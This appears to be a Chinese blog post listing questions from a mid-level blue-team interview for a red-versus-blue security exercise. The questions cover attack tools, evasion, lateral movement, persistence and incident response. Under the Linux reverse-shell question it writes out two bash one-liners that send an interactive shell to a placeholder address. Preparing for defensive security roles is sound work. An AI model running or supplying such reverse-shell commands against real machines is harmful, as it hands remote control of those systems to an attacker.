【面试】记一次HVV蓝队中级(面试题)

2024-07-18 15:37:54 浏览数 (2)

使用过安全设备吗?使用过程中发现过真实攻击行为吗?

SRC经验

网络攻防CTF经历

Web OWasp Top10

常见webshell特征(内存马特征)

Goby在用什么版本?(这是没想到的)

Sqlmap参数

Burpsuite常用插件

MSF生成木马命令行(msfvenom 这问题也是我没想到的)

动态免杀(这里要补一下了,不太熟悉)

mimikaze使用

CS插件使用过那些

Linux系统弹shell命令(bash命令)

代码语言:javascript复制
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1

横向移动思路

应急响应了解吗(流程,想法,思路)

一台机器装不了杀软,怎么进行排查?(手动排查)

自己打的内网靶场多吗?

权限维持思路?

金银票据区别?

自己写过的EXP多吗,使用那些库?

钓鱼邮件(构造思路以及分析思路)

反制思路

总结

动态免杀方面需要补一下、应急响应方面知识没有构成系统,讲的有点乱

0 人点赞